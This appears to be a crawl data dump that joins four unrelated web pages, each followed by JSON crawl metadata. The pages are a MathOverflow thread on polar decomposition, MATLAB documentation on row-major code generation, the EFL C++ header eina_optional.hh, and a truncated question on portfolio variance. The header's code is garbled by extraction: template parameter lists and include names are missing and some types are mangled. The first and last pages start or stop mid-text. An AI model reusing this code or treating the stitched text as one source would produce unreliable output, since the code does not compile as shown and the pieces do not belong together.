\\text{Im}(z)$$ gives us the polar decomposition $$\\text{exp}(z) = e^{\\text{Re}(z)} e^{i\\ \\text{Im}(z)}$$ into a positive real number and a complex number on the unit circle. This analogy is presumably where polar decomposition gets its name.\n\nPut $$\\mathfrak{g} = \\text{Mat}_{n \\times n } (\\mathbb{C})$$, the Lie algebra of $$G = \\text{GL}_n (\\mathbb{C})$$. I would like to use the decomposition $$\\mathfrak{g} = i \\mathfrak{h} \\oplus \\mathfrak{h}$$, where $$\\mathfrak{h}$$ is the sub-$$\\mathbb{C}$$-vector space of hermitian complex matrices and $$i \\mathfrak{h}$$ is the sub-Lie algebra of skew-Hermitian matrices to achieve a decomposition $$A = UP$$ of any $$A \\in \\text{GL}_n (\\mathbb{C})$$ into a unitary matrix $$U$$ and a positive definite matrix $$P$$, making use of the exponential map. However, there is an obvious obstruction: $$\\text{exp}(A + B)$$ is not $$\\text{exp}(A) \\text{exp}(B)$$ necessarily. So the question is, how might we work around this problem?\n\nNow, the subgroup $$U \\subset G$$ of unitary matrices acts on the sub-$$\\mathbb{C}$$-vector space $$P \\subset G$$ of hermitian positive definite matrices by $$(U, P) \\mapsto U^* P U$$, so this theorem will show that $$G$$ has a semi-direct product decomposition $$G = U \\times P$$ with product $$(U, P)(U', P') \\mapsto (UU' , U'^* P U' P)$$.\n\nIt is possibly useful to note that the map $$i \\mathfrak{h} \\rightarrow \\text{End}_{\\mathbb{C}}(\\mathfrak{h})$$ sending $$s$$ to $$\\text{ad}_s$$, where $$\\text{ad}_s (h) = sh - hs$$ is a Lie-algebra representation.\n\n• just to make sure I understand the question: I always thought of the polar decomposition $A=UP$ as the matrix analogue of $z=|z| e^{i\\,{\\rm arg}\\,z}$, so a decomposition into modulus and argument; then $P=(A^\\ast A)^{1/2}$ and $U=AP^+$ (with $P^+$ the pseudo-inverse); this is not what you want? – Carlo Beenakker Oct 13 '18 at 12:05\n• Hi Carlo, that works. I like that since we don't have to use a norm. But I meant to ask something more specific: can the idea above be continued? Specifically, the idea is to use the decomposition of $\\mathfrak{g}$ into $\\mathfrak{h}$ and $i \\mathfrak{h}$ and the exponential map. So, can we find a way to express $\\text{exp} ( s+ h) = UP$ where $s$ is skew hermitian (i.e. $ih'$ for some hermitian operator $h$), $h$ is hermitian, $U$ is unitary, and $P$ is positive definite? As noted, not as simple as the case for $\\mathbb{C}$, where $\\text{exp}(z + w) = \\text{exp}(z) \\text{exp}(w)$. – Dean Young Oct 13 '18 at 13:49\n• Part of my interest is that I want the analogy with $\\mathbb{C}$ to be more clearly expressed in the proof, but I don't know if it would work. – Dean Young Oct 13 '18 at 13:50\n• Actually, I think your method might lead to a way of saying just that - sorry. Maybe you can explain some of what you're thinking in an answer. – Dean Young Oct 13 '18 at 13:53\n• One source of the analogies mentioned at the outset is the classic book by Paul Halmos, Finite Dimensional Vector Spaces. – Jim Humphreys Oct 13 '18 at 14:49\n\nI have always understood the polar decomposition as the matrix analogue of $$z=|z|e^{i\\,{\\rm arg}z}$$ so a decomposition into modulus and argument; the OP want the matrix analogue of a decomposition into real and imaginary parts, $$z=e^{{\\rm Re}\\,z}e^{i\\,{\\rm Im}\\,z}$$, which I have never encountered and may not exist for the reason mentioned by the OP ($$e^{X+iY}\\neq e^Xe^{iY}$$).\nIn any case, if we do follow the first approach, then $$P=(A^∗A)^{1/2}$$ and $$U=AP^+$$ (with $$P^+$$ the pseudo-inverse) gives the unique polar decomposition $$A=UP$$, with $$P$$ Hermitian positive semidefinite and $$U^+=U^\\ast$$.\n• Wait, it should be, \"set $z = e^w$. Then $z = e^{\\text{Re}(w)} e^{i \\text{Im}(w)} =$\". In that case, $e^{\\text{Re}(w)} = |z|$ and $\\text{Im}(w) = \\text{arg}(z) \\text{ mod } 2 \\pi$ – Dean Young Oct 13 '18 at 14:21" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7457492,"math_prob":0.9998425,"size":3036,"snap":"2019-26-2019-30","text_gpt3_token_len":901,"char_repetition_ratio":0.17051451,"word_repetition_ratio":0.0,"special_character_ratio":0.28096178,"punctuation_ratio":0.061818182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.000002,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-20T18:04:46Z\",\"WARC-Record-ID\":\"<urn:uuid:011a5cfa-e6ba-433f-9ad0-abfc3199c0a8>\",\"Content-Length\":\"137060\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:98c39b13-da90-445f-a33a-e06e8dbe2539>\",\"WARC-Concurrent-To\":\"<urn:uuid:377c5f5b-c055-4a2e-ba2d-cfe05d287ace>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/312704/generalizing-polar-decomposition-of-matrices\",\"WARC-Payload-Digest\":\"sha1:EKUI4PWGWXK4NMRRLQHLXNHQWIMH3H2M\",\"WARC-Block-Digest\":\"sha1:FRBZ7S37XZHPCLIJTJD5OLZ7Q3IQL3ZX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627999263.6_warc_CC-MAIN-20190620165805-20190620191805-00185.warc.gz\"}"}
https://la.mathworks.com/help/rtw/ug/generate-row-major-code-with-matlab-function-block.html
[ "## Generate Row-Major Code for Model That Contains a MATLAB Function Block\n\nProgramming languages and environments assume a single array layout for all data. MATLAB® and Fortran use column-major layout by default, whereas C and C++ use row-major layout. With Simulink® Coder™, you can generate C/C++ code that uses row-major layout or column-major layout.\n\nMATLAB Function blocks enable you to define custom functionality in Simulink models by using the MATLAB language. You can generate row-major code for models that contain a MATLAB Function block by using row-major or column-major data. For more information on MATLAB Function blocks, see Implement MATLAB Functions in Simulink with MATLAB Function Blocks.\n\nBy default, the code generator generates column-major code. For C/C++ code generation, you can specify the array layout at the model level by using the Array layout model configuration parameter. Setting this parameter to `Row-major` enables the model for row-major code generation. To enable the MATLAB Function block in your model for row-major code generation, use the `coder.rowMajor` function at the function level inside the block.\n\n### Row-Major Code Generation\n\nFor certain algorithms, row-major layout provides more efficient memory access. You get efficient code when you generate code for a model that uses row-major array layout and the model contains a MATLAB Function block that uses an algorithm for row-major data.\n\n1. Consider an example model `ex_row_major_MLFB`.", null, "This model contains a Constant block that has a `[5 4]` matrix. To specify the matrix, set Constant value to:\n\n`reshape(1:20,5,4)`\nThe Inport block also specifies a `[5 4]` matrix. To specify the matrix, set the Port dimensions to `[5 4]`.\n\n2. In the Configuration Parameters dialog box, set Array layout to `Row-major`.\n\n3. Write a function for matrix addition called `addMatrix`. The MATLAB Function block inherits the array layout setting from the model configuration parameter Array layout unless specified otherwise.\n\nOptionally, you can use `coder.rowMajor` to explicitly set the array layout of the MATLAB Function block to row-major layout.\n\n```function S = addMatrix(A,B) S = zeros(size(A)); for row = 1:size(A,1) for col = 1:size(A,2) S(row,col) = A(row,col) + B(row,col); end end```\n\n4. Generate code for the model. From the C Code tab, click Build.\n\nThe code generator produces this C code:\n\n```for (b_row = 0; b_row < 5; b_row++) { for (b_col = 0; b_col < 4; b_col++) { rtb_S_tmp = (b_row << 2) + b_col; rtb_S[rtb_S_tmp] = ex_row_major_MLFB_P.Constant_Value[rtb_S_tmp] + ex_row_major_MLFB_U.Inport1[rtb_S_tmp]; } }```\nThe generated code has two `for` loops. The first `for` loop accesses the rows and the second `for` loop accesses the columns. When the array layout of the MATLAB Function block and the model is the same, the generated code is efficient because no transposes or conversion are required.\n\n### Mixed-Majority Code Generation\n\nYou can generate mixed-majority code when you have a model that operates on row-major data and a MATLAB Function block that operates on column-major data. When you generate code for a model that uses column-major layout, and the model contains a MATLAB Function block that uses row-major layout, then the code generator converts the block input data to row-major and the block output data back to column-major data, as needed. You can also generate mixed majority code when you have a model that operates on column-major data and a MATLAB Function block that operates on row-major data.\n\nArray layout conversions can affect performance.\n\n1. Consider the example model `ex_row_major_MLFB`. For more information on the example model, see Row-Major Code Generation.\n\nIn the Configuration Parameters dialog box, set Array layout to `Row-major`.\n\n2. Update the `addMatrix` function in the MATLAB Function block for column-major data by using the `coder.columnMajor` function.\n\n```function S = addMatrix(A,B) coder.columnMajor; S = zeros(size(A)); for row = 1:size(A,1) for col = 1:size(A,2) S(row,col) = A(row,col) + B(row,col); end end```\nYou can generate mixed-majority code by using the MATLAB Function block. In this case, you configure the model for row-major array layout and the MATLAB Function block for column-major array layout.\n\n3. Generate code for the model. From the C Code tab, click Build.\n\nThe code generator produces this C code:\n\n```for (b_row = 0; b_row < 4; b_row++) { for (b_col = 0; b_col < 5; b_col++) { B_tmp = (b_col << 2) + b_row; B_tmp_0 = b_col + 5 * b_row; B[B_tmp_0] = ex_row_major_MLFB_19b_U.Inport1[B_tmp]; A[B_tmp_0] = ex_row_major_MLFB_19b_P.Constant_Value[B_tmp]; } } for (b_row = 0; b_row < 5; b_row++) { /* Outport: '<Root>/Outport' */ for (b_col = 0; b_col < 4; b_col++) { B_tmp = 5 * b_col + b_row; ex_row_major_MLFB_19b_Y.Outport[b_col + (b_row << 2)] = A[B_tmp] + B[B_tmp]; }```\nThe inputs to the MATLAB Function block exist in a row-major environment. The code generator performs a conversion operation on inputs before they are fed to the MATLAB Function block because the block is column-major layout. After processing the algorithm in the MATLAB Function block, the code generator converts the data back to row-major data before passing the data to an Outport." ]
[ null, "https://la.mathworks.com/help/rtw/ug/ex_row_major_mlfb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.62000734,"math_prob":0.9269945,"size":4808,"snap":"2022-27-2022-33","text_gpt3_token_len":1187,"char_repetition_ratio":0.18547045,"word_repetition_ratio":0.24021593,"special_character_ratio":0.24750416,"punctuation_ratio":0.1286031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964357,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T06:28:40Z\",\"WARC-Record-ID\":\"<urn:uuid:6ebea970-5786-46a7-8e7e-0397c81871d9>\",\"Content-Length\":\"78523\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:151d188a-6e64-45e6-a2f7-06db6f0dbe00>\",\"WARC-Concurrent-To\":\"<urn:uuid:72f1ed3d-8828-4939-92c0-d7d590104cc6>\",\"WARC-IP-Address\":\"23.46.246.122\",\"WARC-Target-URI\":\"https://la.mathworks.com/help/rtw/ug/generate-row-major-code-with-matlab-function-block.html\",\"WARC-Payload-Digest\":\"sha1:VVRGGMYXEOHCVLV42AHTCQ5RZONUKNHT\",\"WARC-Block-Digest\":\"sha1:4YY5UEAERN3WCLC4CBDBZ7NH5D4Q4KNU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103624904.34_warc_CC-MAIN-20220629054527-20220629084527-00231.warc.gz\"}"}
https://git.enlightenment.org/kimcinoo/efl/src/commit/c4124f8b3658a4f7dd8621d6b0bd86d758d445d8/src/bindings/cxx/eina_cxx/eina_optional.hh
[ "forked from enlightenment/efl\nYou can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.\n\n#### 695 lines 20 KiB Raw Blame History\n\n `#ifndef EINA_OPTIONAL_HH_` `#define EINA_OPTIONAL_HH_` `#include ` `#include ` `#include ` `#include ` `/**` ` * @addtogroup Eina_Cxx_Data_Types_Group` ` *` ` * @{` ` */` ``` ``` `namespace efl_eina_swap_adl {` ``` ``` `/**` ` * @internal` ` */` `template ` `void swap_impl(T& lhs, T& rhs)` `{` ` using namespace std;` ` swap(lhs, rhs);` `}` ``` ``` `}` ``` ``` `namespace efl { namespace eina {` ``` ``` `/**` ` * @defgroup Eina_Cxx_Optional_Group Optional Value` ` * @ingroup Eina_Cxx_Data_Types_Group` ` *` ` * @{` ` */` ``` ``` `/**` ` * @internal` ` */` `template ` `void adl_swap(T& lhs, T& rhs)` `{` ` ::efl_eina_swap_adl::swap_impl(lhs, rhs);` `}` ``` ``` `/**` ` * This class manages an optional contained value, i.e. a value that` ` * semantically may not be present.` ` *` ` * A common use case for optional is the return value of a function that` ` * may fail. As opposed to other approaches, such as` ` * std::pair, optional handles expensive to construct` ` * objects well and is more readable, as the intent is expressed` ` * explicitly.` ` *` ` * An optional object holding a semantically present value is considered` ` * to be @em engaged, otherwise it is considered to be @em disengaged.` ` */` `template ` `struct optional` `{` ` typedef optional _self_type; /**< Type for the optional class itself. */` ``` ``` ` /**` ` * @brief Create a disengaged object.` ` *` ` * This constructor creates a disengaged eina::optional` ` * object.` ` */` ` constexpr optional(std::nullptr_t) : engaged(false)` ` {}` ``` ``` ` /**` ` * @brief Default constructor. Create a disengaged object.` ` */` ` constexpr optional() : engaged(false)` ` {}` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` optional(T&& other) : engaged(false)` ` {` ` _construct(std::forward(other));` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by copying @p other content.` ` * @param other Constant reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by copying` ` * @p other.` ` */` ` optional(T const& other) : engaged(false)` ` {` ` _construct(other);` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` template ` ` optional(U&& other, typename std::enable_if::value>::type* = 0) : engaged(false)` ` {` ` _construct(std::forward(other));` ` }` ``` ``` ` /**` ` * @brief Create an engaged object by copying @p other content.` ` * @param other Constant reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by copying` ` * @p other.` ` */` ` template ` ` optional(U const& other, typename std::enable_if::value>::type* = 0) : engaged(false)` ` {` ` _construct(other);` ` }` ``` ``` ` /**` ` * @brief Copy constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * copying the contained value of @p other.` ` */` ` optional(optional const& other)` ` : engaged(false)` ` {` ` if(other.engaged) _construct(*other);` ` }` ``` ``` ` /**` ` * @brief Move constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other R-value reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * moving the contained value of @p other.` ` */` ` optional(optional&& other)` ` : engaged(false)` ` {` ` if(other.engaged) _construct(std::move(*other));` ` other._destroy();` ` }` ``` ``` ` /**` ` * @brief Move constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other R-value reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * moving the contained value of @p other.` ` */` ` template ` ` optional(optional&& other, typename std::enable_if::value>::type* = 0)` ` : engaged(false)` ` {` ` if (other.is_engaged()) _construct(std::move(*other));` ` other.disengage();` ` }` ``` ``` ` /**` ` * @brief Copy constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * converting and copying the contained value of @p other.` ` */` ` template ` ` optional(optional const& other, typename std::enable_if::value>::type* = 0)` ` : engaged(false)` ` {` ` if (other.is_engaged()) _construct(*other);` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other R-value reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is moved to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(optional&& other)` ` {` ` _destroy();` ` if (other.engaged)` ` _construct(std::move(*other));` ` other._destroy();` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is copied to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(optionalconst& other)` ` {` ` optional tmp(other);` ` tmp.swap(*this);` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other R-value reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is moved to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` template ` ` typename std::enable_if::value, _self_type>::type& operator=(optional&& other)` ` {` ` _destroy();` ` if (other.is_engaged())` ` _construct(std::move(*other));` ` other.disengage();` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds a different, but convertible, value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is converted and copied to this` ` * object, making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` template ` ` typename std::enable_if::value, _self_type>::type& operator=(optionalconst& other)` ` {` ` _destroy();` ` if (other.is_engaged())` ` _construct(*other);` ` return *this;` ` }` ``` ``` ` /**` ` * @brief Disengage the object, destroying the current contained value, if any.` ` */` ` void disengage()` ` {` ` _destroy();` ` }` ``` ``` ` /**` ` * @brief Releases the contained value if the object is engaged.` ` */` ` ~optional()` ` {` ` _destroy();` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is engaged, @c false otherwise.` ` */` ` explicit operator bool() const` ` {` ` return is_engaged();` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is disengaged, @c false otherwise.` ` */` ` bool operator!() const` ` {` ` bool b ( *this );` ` return !b;` ` }` ``` ``` ` /**` ` * @brief Access member of the contained value.` ` * @return Pointer to the contained value, whose member will be accessed.` ` */` ` T* operator->()` ` {` ` assert(is_engaged());` ` return static_cast(static_cast(&buffer));` ` }` ``` ``` ` /**` ` * @brief Access constant member of the contained value.` ` * @return Constant pointer to the contained value, whose member will be accessed.` ` */` ` T const* operator->() const` ` {` ` return const_cast<_self_type&>(*this).operator->();` ` }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& operator*() { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& operator*() const { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& get() { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& get() const { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Swap content with another eina::optional object.` ` * @param other Another eina::optional object.` ` */` ` void swap(optional& other)` ` {` ` if(is_engaged() && other.is_engaged())` ` {` ` eina::adl_swap(**this, *other);` ` }` ` else if(is_engaged())` ` {` ` other._construct(std::move(**this));` ` _destroy();` ` }` ` else if(other.is_engaged())` ` {` ` _construct(std::move(*other));` ` other._destroy();` ` }` ` }` ``` ``` ` /**` ` * @brief Check if the object is engaged.` ` * @return @c true if the object is currently engaged, @c false otherwise.` ` */` ` bool is_engaged() const` ` {` ` return engaged;` ` }` `private:` ``` ``` ` /**` ` * @internal` ` */` ` template ` ` void _construct(U&& object)` ` {` ` assert(!is_engaged());` ` new (&buffer) T(std::forward(object));` ` engaged = true;` ` }` ``` ``` ` /**` ` * @internal` ` */` ` void _destroy()` ` {` ` if(is_engaged())` ` {` ` static_cast(static_cast(&buffer))->~T();` ` engaged = false;` ` }` ` }` ``` ``` ` typedef typename std::aligned_storage` ` ::value>::type buffer_type;` ``` ``` ` /**` ` * Member variable for holding the contained value.` ` */` ` buffer_type buffer;` ``` ``` ` /**` ` * Flag to tell whether the object is engaged or not.` ` */` ` bool engaged;` `};` ``` ``` `template ` `struct optional` `{` ` typedef optional _self_type; /**< Type for the optional class itself. */` ``` ``` ` /**` ` * @brief Create a disengaged object.` ` *` ` * This constructor creates a disengaged eina::optional` ` * object.` ` */` ` constexpr optional(std::nullptr_t) : pointer(nullptr)` ` {}` ``` ``` ` /**` ` * @brief Default constructor. Create a disengaged object.` ` */` ` constexpr optional() : pointer(nullptr)` ` {}` ``` ``` ` /**` ` * @brief Create an engaged object by moving @p other content.` ` * @param other R-value reference to the desired type.` ` *` ` * This constructor creates an eina::optional object in an` ` * engaged state. The contained value is initialized by moving` ` * @p other.` ` */` ` optional(T& other) : pointer(&other)` ` {` ` }` ``` ``` ` /**` ` * @brief Copy constructor. Create an object containing the same value as @p other and in the same state.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This constructor creates an eina::optional object with` ` * the same engagement state of @p other. If @p other is engaged then` ` * the contained value of the newly created object is initialized by` ` * copying the contained value of @p other.` ` */` ` optional(_self_type const& other) = default;` ``` ``` ` /**` ` * @brief Assign new content to the object.` ` * @param other Constant reference to another eina::optional object that holds the same value type.` ` *` ` * This operator replaces the current content of the object. If` ` * @p other is engaged its contained value is copied to this object,` ` * making *this be considered engaged too. If @p other is` ` * disengaged *this is also made disengaged and its` ` * contained value, if any, is simple destroyed.` ` */` ` _self_type& operator=(_self_type const& other) = default;` ``` ``` ` /**` ` * @brief Disengage the object, destroying the current contained value, if any.` ` */` ` void disengage()` ` {` ` pointer = NULL;` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is engaged, @c false otherwise.` ` */` ` explicit operator bool() const` ` {` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Convert to @c bool based on whether the object is engaged or not.` ` * @return @c true if the object is disengaged, @c false otherwise.` ` */` ` bool operator!() const` ` {` ` bool b ( *this );` ` return !b;` ` }` ``` ``` ` /**` ` * @brief Access member of the contained value.` ` * @return Pointer to the contained value, whose member will be accessed.` ` */` ` T* operator->()` ` {` ` assert(is_engaged());` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Access constant member of the contained value.` ` * @return Constant pointer to the contained value, whose member will be accessed.` ` */` ` T const* operator->() const` ` {` ` return pointer;` ` }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& operator*() { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& operator*() const { return get(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Reference to the contained value.` ` */` ` T& get() { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Get the contained value.` ` * @return Constant reference to the contained value.` ` */` ` T const& get() const { return *this->operator->(); }` ``` ``` ` /**` ` * @brief Swap content with another eina::optional object.` ` * @param other Another eina::optional object.` ` */` ` void swap(optional& other)` ` {` ` std::swap(pointer, other.pointer);` ` }` ``` ``` ` /**` ` * @brief Check if the object is engaged.` ` * @return @c true if the object is currently engaged, @c false otherwise.` ` */` ` bool is_engaged() const` ` {` ` return pointer;` ` }` `private:` ``` ``` ` /**` ` * Member variable for holding the contained value.` ` */` ` T* pointer;` `};` ` ` `template ` `constexpr optional::type>` `make_optional(T&& value)` `{` ` return optional::type>(std::forward(value));` `}` ``` ``` `/**` ` * @brief Swap content with another eina::optional object.` ` *` ` */` `template ` `void swap(optional& lhs, optional& rhs)` `{` ` lhs.swap(rhs);` `}` ``` ``` `/**` ` * @brief Check if both eina::optional object are equal.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both are objects are disengaged of if both objects` ` * are engaged and contain the same value, @c false in all` ` * other cases.` ` */` `template ` `bool operator==(optional const& lhs, optional const& rhs)` `{` ` if(!lhs && !rhs)` ` return true;` ` else if(!lhs || !rhs)` ` return false;` ` else` ` return *lhs == *rhs;` `}` ``` ``` `/**` ` * @brief Check if the eina::optional objects are different.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return The opposite of @ref operator==(optional const& lhs, optional const& rhs).` ` */` `template ` `bool operator!=(optional const& lhs, optional const& rhs)` `{` ` return !(lhs == rhs);` `}` ``` ``` `/**` ` * @brief Less than comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both objects are engaged and the contained value` ` * of @p lhs is less than the contained value of @p rhs, or if` ` * only @p lhs is disengaged. In all other cases returns` ` * @c false.` ` */` `template ` `bool operator<(optional const& lhs, optional const& rhs)` `{` ` if(!lhs && !rhs)` ` return false;` ` else if(!lhs)` ` return true;` ` else if(!rhs)` ` return false;` ` else` ` return *lhs < *rhs;` `}` ``` ``` `/**` ` * @brief Less than or equal comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if @p lhs is disengaged or if both objects are` ` * engaged and the contained value of @p lhs is less than or` ` * equal to the contained value of @p rhs. In all other cases` ` * returns @c false.` ` */` `template ` `bool operator<=(optional const& lhs, optional const& rhs)` `{` ` return lhs < rhs || lhs == rhs;` `}` ``` ``` `/**` ` * @brief More than comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if both objects are engaged and the contained value` ` * of @p lhs is more than the contained value of @p rhs, or if` ` * only @p rhs is disengaged. In all other cases returns` ` * @c false.` ` */` `template ` `bool operator>(optional const& lhs, optional const& rhs)` `{` ` return !(lhs <= rhs);` `}` ``` ``` `/**` ` * @brief More than or equal comparison between eina::optional objects.` ` * @param lhs eina::optional object at the left side of the expression.` ` * @param rhs eina::optional object at the right side of the expression.` ` * @return @c true if @p rhs is disengaged or if both objects are` ` * engaged and the contained value of @p lhs is more than or` ` * equal to the contained value of @p rhs. In all other` ` * cases returns @c false.` ` */` `template ` `bool operator>=(optional const& lhs, optional const& rhs)` `{` ` return !(lhs < rhs);` `}` ``` ``` `/**` ` * @}` ` */` ``` ``` `} } // efl::eina` `/**` ` * @}` ` */` ``` ``` ```#endif // EINA_OPTIONAL_HH_ ``` ``` ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5153133,"math_prob":0.76735276,"size":19838,"snap":"2023-14-2023-23","text_gpt3_token_len":5372,"char_repetition_ratio":0.22471513,"word_repetition_ratio":0.77065,"special_character_ratio":0.3415163,"punctuation_ratio":0.17175107,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96269643,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-09T03:51:33Z\",\"WARC-Record-ID\":\"<urn:uuid:b9fec013-4cae-4ee5-9558-194da3eaae91>\",\"Content-Length\":\"357244\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b658b69-0165-4c72-8671-e7dc5bdc5834>\",\"WARC-Concurrent-To\":\"<urn:uuid:b79c5a74-efc1-4c0e-954c-c2bba0ea458c>\",\"WARC-IP-Address\":\"140.211.167.131\",\"WARC-Target-URI\":\"https://git.enlightenment.org/kimcinoo/efl/src/commit/c4124f8b3658a4f7dd8621d6b0bd86d758d445d8/src/bindings/cxx/eina_cxx/eina_optional.hh\",\"WARC-Payload-Digest\":\"sha1:BQLMNRTXZTQHMTJZLRCTRF3MKZZO5EV5\",\"WARC-Block-Digest\":\"sha1:FFPBB7WVTLP3DEA6HRYJWGLXSFBY6EIZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224655247.75_warc_CC-MAIN-20230609032325-20230609062325-00787.warc.gz\"}"}
https://stats.stackexchange.com/questions/126675/variance-of-portfolio-future-values-based-on-return-distribution
[ "# Variance of portfolio future values based on return distribution\n\nI'm trying to estimate the distribution of future portfolio values based on the distribution of a portfolio's returns.\n\nFirst, to define some variables:\n\n• Rt = simple return for period t\n• rt = ln(1+Rt)\n• Vt = portfolio value at period t\n\nIf we assume rt is a normally distributed random value and an initial investment of $1, ln(Vt) = r1 + r2 + ... + rt. Since ln(Vt) is a sum of normally distributed random variables, ln(Vt) is also normal. Its mean is t * mean(rt), and its variance is t * var(rt). MY PROBLEM: I need to get the distribution of portfolio values based on a starting value that is not 1 dollar and cash inflows/outflows each period thereafter. I can get the mean by adding ln(starting_value). However, I am not sure how to modify the variance from the scenario above to adjust for the fact that my scale is no longer based on a starting value of$1. If I just take the cumulative sum of the variance of the returns like I did in the scenario above, the portfolio's variance each period is far too small.\n\nAny help would be greatly appreciated. I can provide a spreadsheet with a fairly simple example calculation if that helps clarify what I'm trying to do.\n\nRead RiskMetrics Technical Manual here. It describes value-at-risk (VaR) computation. That's what you're trying to do. Particularly, you're implementing so called \"historical VaR\" with a parametric distribution fit.\n\n• The 